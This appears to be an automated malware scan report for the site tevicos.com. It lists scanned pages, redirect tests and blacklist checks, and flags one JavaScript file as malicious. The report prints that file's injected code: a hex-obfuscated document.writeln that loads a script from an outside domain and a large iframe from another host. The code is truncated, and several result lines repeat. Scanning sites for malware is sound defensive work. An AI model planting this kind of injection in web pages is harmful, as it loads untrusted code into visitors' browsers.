Scanned pages/files
| Request | Server response | Status |
http://www.tevicos.com/ | 200 OK Content-Length: 8148 Content-Type: text/html | clean |
http://www.tevicos.com/js/top.js | 200 OK Content-Length: 1170 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6e\x69\x78\x69\x75\x2e\x63\x6f\x6d\x2f\x74\x6f\x6e\x67\x6a\x69\x2f\x32\x30\x31\x33\x31\x32\x33\x30\x2e\x67\x6f\x2e\x6a\x73\"\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3 document.writeln("<iframe marginheight=0 marginwidth=0 noresize scrolling=no document.writeln("<iframe marginheight=0 marginwidth=0 noresize scrolling=no frameborder=0 src=http:\/\/aaa.chaojiad.info\/ad\/y.htm width=1000 height=3000><\/iframe>") Antivirus reports:
| ||
http://www.tevicos.com/js/tj.js | 200 OK Content-Length: 124 Content-Type: application/javascript | clean |
http://www.tevicos.com/tag/butbqetqe.html | 200 OK Content-Length: 9321 Content-Type: text/html | clean |
http://www.tevicos.com/tag/butbqeqcb.html | 200 OK Content-Length: 10329 Content-Type: text/html | clean |
http://www.tevicos.com/tag/butbqojtj.html | 200 OK Content-Length: 10335 Content-Type: text/html | clean |
http://www.tevicos.com/tag/butbqotqt.html | 200 OK Content-Length: 8742 Content-Type: text/html | clean |
http://www.tevicos.com/tag/butbqoqcq.html | 200 OK Content-Length: 9867 Content-Type: text/html | clean |
http://www.tevicos.com/tag/butbqqjuc.html | 200 OK Content-Length: 9397 Content-Type: text/html | clean |
http://www.tevicos.com/tag/butbqqtqu.html | 200 OK Content-Length: 9670 Content-Type: text/html | clean |
http://www.tevicos.com/tag/butbqqqco.html | 200 OK Content-Length: 9848 Content-Type: text/html | clean |
http://www.tevicos.com/tag/butbqbjug.html | 200 OK Content-Length: 8918 Content-Type: text/html | clean |
http://www.tevicos.com/tag/butbqbtqi.html | 200 OK Content-Length: 9170 Content-Type: text/html | clean |
http://www.tevicos.com/tag/butbqbqce.html | 200 OK Content-Length: 10060 Content-Type: text/html | clean |
http://www.tevicos.com/tag/butbqgjub.html | 200 OK Content-Length: 9209 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tevicos.com
Result:
GET / HTTP/1.1
Host: tevicos.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tevicos.com
Referer: http://www.google.com/search?q=tevicos.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tevicos.com
Referer: http://www.google.com/search?q=tevicos.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tevicos.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tevicos.com/
Result: tevicos.com is not infected or malware details are not published yet.
Result: tevicos.com is not infected or malware details are not published yet.